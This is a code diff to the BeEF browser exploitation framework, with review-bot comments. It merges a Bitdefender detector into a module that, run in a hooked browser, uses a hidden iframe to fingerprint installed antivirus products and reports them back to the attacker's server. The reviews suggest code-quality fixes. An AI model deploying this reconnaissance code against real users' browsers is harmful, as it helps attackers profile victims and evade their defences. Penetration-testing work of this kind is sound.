diff --git a/modules/host/detect_antivirus/command.js b/modules/host/detect_antivirus/command.js
new file mode 100644
index 000000000..bbe3ba93c
--- /dev/null
+++ b/modules/host/detect_antivirus/command.js
@@ -0,0 +1,40 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ //Detection of av elements starts
+ var image = "";
+ var iframe = document.createElement("iframe");
+ iframe.setAttribute("style", "margin-left:-10000000000px; margin-right: -10000000000px");
+ iframe.setAttribute("id", "frmin");
+ document.body.appendChild(iframe);
+ iframe.contentWindow.document.open();
+ iframe.contentWindow.document.write(image);
+ iframe.contentWindow.document.close();
+
+ var frm = document.getElementById("frmin");
+ ka = frm.contentDocument.getElementsByTagName("html")[0].outerHTML;
+ var AV = document.getElementById("abs-top-frame");
+ var NAV = document.getElementById("coFrameDiv");
+ //Detection of av elements ends
+
+ if (ka.indexOf("kasperskylab_antibanner") !== -1)
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Kaspersky');
+ else if (ka.indexOf("netdefender/hui/ndhui.js") !== -1)
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Bitdefender');
+ else if (AV !== null) {
+ if (AV.outerHTML.indexOf('/html/top.html') >= 0 & AV.outerHTML.indexOf('chrome-extension://') >= 0)
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Avira');
+ } else if (NAV !== null) {
+ var nort = NAV.outerHTML;
+ if (nort.indexOf('coToolbarFrame') >= 0 & nort.indexOf('/toolbar/placeholder.html') >= 0 & nort.indexOf('chrome-extension://') >= 0)
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Norton');
+ } else if (document.getElementsByClassName('drweb_btn').length > 0)
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=DrWeb');
+ else beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Not Detected');
+
+});
\ No newline at end of file
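Review bot: When `AV` or `NAV` is found but the nested `indexOf` test fails (the `else if (AV !== null) {` and `else if (NAV !== null) {` branches), nothing is sent at all — the chain neither reaches the DrWeb check nor the `'antivirus=Not Detected'` fallback, so the module never reports a result for that browser. Those same conditions use bitwise `&` where `&&` is meant; it happens to work on the boolean operands but evaluates both sides and reads as a typo. `ka` is assigned without `var` and becomes an implicit global; write `var ka = frm.contentDocument.getElementsByTagName("html")[0].outerHTML;`. Collapsing the chain into one result variable that is always sent fixes the silent branches and removes the nested ifs; `image` is always `""`, so `document.write("")` could take the literal and the variable can go.
```javascript
  // … unchanged: iframe probe, ka / AV / NAV lookups …
  var avHtml = AV !== null ? AV.outerHTML : "";
  var navHtml = NAV !== null ? NAV.outerHTML : "";
  var result = "Not Detected";
  if (ka.indexOf("kasperskylab_antibanner") !== -1)
    result = "Kaspersky";
  else if (ka.indexOf("netdefender/hui/ndhui.js") !== -1)
    result = "Bitdefender";
  else if (avHtml.indexOf('/html/top.html') >= 0 && avHtml.indexOf('chrome-extension://') >= 0)
    result = "Avira";
  else if (navHtml.indexOf('coToolbarFrame') >= 0 && navHtml.indexOf('/toolbar/placeholder.html') >= 0 && navHtml.indexOf('chrome-extension://') >= 0)
    result = "Norton";
  else if (document.getElementsByClassName('drweb_btn').length > 0)
    result = "DrWeb";
  beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=' + result);
```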
diff --git a/modules/host/detect_bitdefender2012/config.yaml b/modules/host/detect_antivirus/config.yaml
similarity index 61%
rename from modules/host/detect_bitdefender2012/config.yaml
rename to modules/host/detect_antivirus/config.yaml
index a5c5eb4b7..576de4e30 100644
--- a/modules/host/detect_bitdefender2012/config.yaml
+++ b/modules/host/detect_antivirus/config.yaml
@@ -5,11 +5,11 @@
 #
 beef:
 module:
- detect_bitdefender2012:
+ detect_antivirus:
 enable: true
 category: "Host"
- name: "Detect Bit Defender 2012"
- description: "This module detect the javascript code automatically included by Bitdefender 2012"
- authors: ["nbblrr"]
+ name: "Detect Antivirus"
+ description: "This module detect the javascript code automatically included by some AVs (currently supports detection for Kaspersky, Avira, BitDefender, Norton, Dr. Web)"
+ authors: ["phosphore","vah13","nbblrr"]
 target:
 working: ["ALL"]
diff --git a/modules/host/detect_bitdefender2012/module.rb b/modules/host/detect_antivirus/module.rb
similarity index 66%
rename from modules/host/detect_bitdefender2012/module.rb
rename to modules/host/detect_antivirus/module.rb
index ab5513bbe..10b72a6ff 100644
--- a/modules/host/detect_bitdefender2012/module.rb
+++ b/modules/host/detect_antivirus/module.rb
@@ -4,10 +4,10 @@
 # See the file 'doc/COPYING' for copying permission
 #
-class Detect_bitdefender2012 < BeEF::Core::Command
+class Detect_antivirus < BeEF::Core::Command
 def post_execute
- save({'BitDefender' => @datastore['bitdefender']})
+ save({'Antivirus' => @datastore['antivirus']})
 end
 end
diff --git a/modules/host/detect_bitdefender2012/command.js b/modules/host/detect_bitdefender2012/command.js
deleted file mode 100644
index 267ed508b..000000000
--- a/modules/host/detect_bitdefender2012/command.js
+++ /dev/null
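Review bot: The new `description` in config.yaml reads `This module detect the javascript code automatically included by some AVs …`; it should read `This module detects the JavaScript code automatically included by some AVs …`. The `antivirus` datastore key read in module.rb's `post_execute` matches the `antivirus=` parameter the new command.js sends, so the rename is consistent across the three files.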
@@ -1,17 +0,0 @@
-//
-// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-beef.execute(function() {
- var temp=document.body.innerHTML;
- var key="netdefender/hui/ndhui.js";
- if(temp.indexOf(key)>0) {
- beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Installed');
- } else {
- beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Not Installed');
- };
-
-});
-